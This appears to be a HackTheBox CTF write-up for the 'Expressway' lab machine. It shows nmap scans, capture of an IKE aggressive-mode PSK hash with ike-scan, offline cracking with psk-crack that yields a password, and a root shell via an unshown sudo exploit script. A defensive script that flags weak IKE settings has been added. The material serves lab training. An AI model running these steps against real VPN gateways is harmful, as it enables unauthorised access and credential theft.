[HackTheBox] Expressway-writeup
machineinfo
- linux
- easy
recon
┌──(notthei㉿kali)-[~]
└─$ nmap -sCV -T4 -Pn 10.10.11.87
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-14 13:21 JST
Nmap scan report for 10.10.11.87
Host is up (0.59s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.04 seconds
Over TCP, only port 22 was open.
┌──(notthei㉿kali)-[~]
└─$ nmap 10.10.11.87 -sU --top-ports 100
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-14 13:28 JST
Nmap scan report for 10.10.11.87
Host is up (0.26s latency).
Not shown: 96 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike
Nmap done: 1 IP address (1 host up) scanned in 102.66 seconds
Over UDP, the ports listed above were found.
ikescan
ISAKMP caught my attention, so I looked it up.
In short, it handles authentication and key exchange with the peer in order to establish a secure tunnel.
┌──(notthei㉿kali)-[~]
└─$ sudo ike-scan -M 10.10.11.87
[sudo] password for notthei:
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Main Mode Handshake returned
HDR=(CKY-R=afce6c4d9b34dc40)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Encryption is 3DES, the hash is SHA1, and key exchange uses 1024-bit DH, so this looks crackable by brute force.
┌──(notthei㉿kali)-[~]
└─$ sudo ike-scan -A -P -M 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=354d7765341f64f4)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
9213525e6688e5a1dae9cfa82b93ec631b87f0d1c4bebf64639cf128e1c36b0d8904e6b00cc4e646639cbc37a7da386711860dfd80a9d579e26b381005bcee46177fe050119fc2f798e9dd7049141ac0f3c8128ffaa69edeed87ed38005a6bb238f837f1f5888806becaa2f2bcff47b1859a485d2822b03993835e7ac184b9a1:4f39e970eb7ae9493ce229140e0d26d0868304fcec529b53b6f3e3f03bd03fdcbee196f634808ea797c0658b5fe0edafcd3652cd1f96a38624122324ddc5f1a402cf0ea38586fee6580c8826e8dd183b83edc00a4279a948a00012b53290d5d1afc3e91a1cad2bae54b4bf3b6d0bd7a92e19d12dfa978edcfcf591eabd07e3cc:354d7765341f64f4:db25d24d4fe3f2d7:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:d59a0b084363c7efee551e3d6349caa128405580:0fc309790dc17bdbee4ed23ce177e660566b81614cd42e16ab6e687dd75f6a0a:8c37c1c7c30a426e85e7c51e0f3530e9c57c259c
This revealed a user named ike.
Next, crack the hash with psk-crack.
┌──(notthei㉿kali)-[~]
└─$ psk-crack -d /usr/share/wordlists/rockyou.txt psk.psk
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash da79f5f042eabada0fcaec438804958f770f876d
Ending psk-crack: 8045040 iterations in 2.692 seconds (2988470.39 iterations/sec)
The password was recovered.
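A defender-side check added here (not part of the original writeup): it parses the SA lines that ike-scan printed above and flags the parameters that made the cracking possible, including the aggressive-mode-with-PSK combination that exposes the responder hash. The sample lines are copied from the output above; the mode labels attached to them are assumptions.

```python
import re

# Constructed sample input: the SA lines the two ike-scan handshakes above returned.
# Assumption: the first came from the Main Mode probe and the second from the
# Aggressive Mode (-A) probe, as in the writeup output.
SAMPLE_RESPONSES = [
    ("Main Mode", "SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)"),
    ("Aggressive Mode", "SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)"),
]

# Parameters that should no longer appear in an accepted IKEv1 proposal.
WEAK_ENC = {"DES", "3DES"}
WEAK_HASH = {"MD5", "SHA1"}
WEAK_DH_GROUPS = {"1", "2", "5"}  # modp768, modp1024, modp1536


def parse_sa(line):
    """Turn an ike-scan 'SA=(k=v k=v ...)' line into a dict; None if not an SA line."""
    m = re.search(r"SA=\((.*?)\)", line)
    if m is None:
        return None
    return dict(kv.split("=", 1) for kv in m.group(1).split() if "=" in kv)


def audit_proposal(mode, line):
    """Return the list of weaknesses found in one accepted proposal."""
    sa = parse_sa(line)
    if sa is None:
        return ["no SA transform found in line"]
    findings = []
    if sa.get("Enc") in WEAK_ENC:
        findings.append(f"weak cipher {sa['Enc']}")
    if sa.get("Hash") in WEAK_HASH:
        findings.append(f"weak hash {sa['Hash']}")
    group = sa.get("Group", "").split(":")[0]  # 'Group=2:modp1024' -> '2'
    if group in WEAK_DH_GROUPS:
        findings.append(f"weak DH group {sa.get('Group')}")
    if mode == "Aggressive Mode" and sa.get("Auth") == "PSK":
        findings.append("aggressive mode with PSK: responder hash crackable offline")
    return findings


def audit_all(responses):
    """Audit every (mode, SA line) pair and map mode -> findings."""
    return {mode: audit_proposal(mode, line) for mode, line in responses}


if __name__ == "__main__":
    for mode, findings in audit_all(SAMPLE_RESPONSES).items():
        print(f"{mode}: {', '.join(findings) or 'no weak parameters'}")
```

The fix on the gateway side is to disable aggressive mode (or move to IKEv2) and to accept only AES, SHA-2 and DH group 14 or stronger.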
user
ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt
root
Checking the sudo version showed it was 1.9, which has a known vulnerability.
ike@expressway:~$ sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
ike@expressway:~$ sh exp.sh
[*] Running exploit…
root@expressway:/# whoami
root
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)